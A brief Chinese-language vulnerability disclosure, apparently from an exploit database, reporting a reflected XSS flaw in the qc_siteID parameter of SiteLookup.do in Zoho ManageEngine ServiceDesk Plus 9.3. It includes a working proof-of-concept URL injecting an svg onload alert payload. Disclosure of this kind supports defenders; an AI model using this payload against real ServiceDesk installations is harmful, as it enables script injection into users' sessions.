信息描述:在Zoho ManageEngine ServiceDesk Plus 9.3中发现一个问题。通过SiteLookup.do的qc_siteID参数存在XSS漏洞。
作者:Tarantula团队 - VinCSS(Vingroup成员)的Concobe
domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=